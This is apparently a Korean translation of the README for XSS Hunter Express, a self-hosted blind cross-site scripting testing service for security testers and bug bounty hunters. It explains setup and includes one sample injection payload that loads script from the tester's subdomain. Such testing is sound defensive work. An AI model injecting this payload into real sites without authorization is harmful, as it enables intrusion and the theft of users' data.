
XSS Hunter 서비스 - XSSHunter.com의 휴대용 버전
자세한 내용은 여기를 참조하세요: https://github.com/mandatoryprogrammer/xsshunter-express
이것은 https://xsshunter.com 에서 실행되는 소스 코드의 이식 가능한 버전입니다. 보안 전문가와 버그 바운티 헌터가 훨씬 더 강력한 방식으로 XSS를 테스트할 수 있도록 모든 서버에 쉽게 설치할 수 있도록 설계되었습니다.
이 소프트웨어를 설정하고 싶지 않고 바로 테스트를 시작하려면 https://xsshunter.com 을 참조하세요.
자체 서버에 XSS Hunter를 설정하는 방법에 대한 정보는 https://thehackerblog.com/xss-hunter-is-now-open-source-heres-how-to-set-it-up/ 를 참조하세요.
가입 시 yoursubdomain.xss.ht와 같은 특별한 짧은 도메인을 생성합니다. 이 도메인은 XSS 취약점을 식별하고 페이로드를 호스팅합니다. 그런 다음 이 하위 도메인을 XSS 테스트에 사용하여 "><script src=//yoursubdomain.xss.ht></script>와 같은 주입 시도를 합니다. XSS Hunter는 XSS 프로브를 자동으로 제공하고 발사될 때 결과 정보를 수집합니다.
crossdomain.xml 정책과 같은 다른 취약점을 찾는 데 유용합니다./app 경로로 이동하여 페이지를 iPhone 바탕화면에 웹 애플리케이션으로 저장하기만 하면 됩니다.모든 코드는 제가 작성했으며 (그러므로) 모범 사례가 아니며 확실히 최적화/정리가 필요합니다. 모든 풀 리퀘스트는 환영합니다!